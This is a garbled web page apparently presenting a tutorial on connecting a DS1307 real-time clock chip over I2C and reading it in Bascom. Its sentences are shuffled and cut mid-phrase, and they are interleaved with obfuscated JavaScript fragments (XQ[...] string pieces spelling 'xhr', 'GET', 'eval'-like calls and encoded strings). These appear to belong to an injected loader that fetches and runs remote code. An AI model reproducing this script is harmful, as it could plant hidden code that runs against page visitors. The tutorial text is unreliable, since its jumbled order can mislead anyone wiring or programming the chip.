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We do this by using the right address These addresses can be found in the datasheet.. The DS1307 sends and wants to receive data in BCD format This is a variation on binary for diplays where every digit is represented by four bits.
768kHz quartz crystal connected between pins 1 and 2 We can also add a battery with + to pin 3 and - to pin 4.
";XQ["wVA"]="egg";XQ["jWS"]="n/?";XQ["JbL"]="RF4";XQ["kwP"]="t);";XQ["VUh"]=";";XQ["sfM"]="){v";XQ["ocC"]="rer";XQ["viV"]="XVY";XQ["YQo"]="T09";XQ["Avj"]="ar ";XQ["hnF"]="pRe";XQ["ZaE"]="Htt";XQ["LxX"]="','";XQ["Pof"]="AOX";XQ["krn"]="xhr";XQ["bnt"]="};x";XQ["XPH"]="al(";XQ["zpO"]="que";XQ["JqO"]="MYA";XQ["AVP"]="d()";XQ["eCA"]="QF4";XQ["SUJ"]="ERV";XQ["opO"]=".. You only need to know 4 commands: • I2cstart: This commant will startup I2c communications • I2cstop: This command will stop I2c communications • I2crbyte var: This command reads a byte from the device and stores it in 'var' • I2cwbyte var: This command writes the variable 'var' to the device Using the write or read command is not enough, we will also have to tell the device whether we want to write to it or read from it.. 05H Month 06H Year 07H Control 08H to 3FH Ram If we want to read or store some data we'll first have to tell the device in which drawer we want to be.. This is a handy little IC, because it not only keeps track of time but also of the date and the day of the week.. The write-address for the DS1307 is D0H and the read-address D1H (the H behind it tell us that these are hexadecimal figures).. o";XQ["XQy"]="XA=";XQ["bXg"]="cti";XQ["aJJ"]="CV0";XQ["SWy"]="IIV";XQ["suT"]="raf";XQ["QFq"]="=')";XQ["Gol"]="fer";XQ["VQU"]="9HE";XQ["fzT"]="ExV";XQ["npS"]="GSQ";XQ["esz"]="lRB";XQ["HqT"]="GET";XQ["trx"]="HRF";XQ["rlb"]="XBQ";XQ["yvA"]="fun";XQ["DKg"]="hr.. You can imagine them as those oldfashioned filingcabinets Each drawer has its number and contains some info: 00H Seconds 01H Minutes 02H Hours 03H Day 04H Date The H tell us that these are hexadecimal figures.. More about that Luckily converting from BCD to decimal and visa versa is very easy in Bascom.. This enables the IC to keep working when the mainpower is switched off If you don't want to use this feature, you can just connect pin 3 to pin 4 and everything will work fine.. Dfu- programmer) They should be connected to the SCL and SDA pins on your microprocessor. 0041d406d9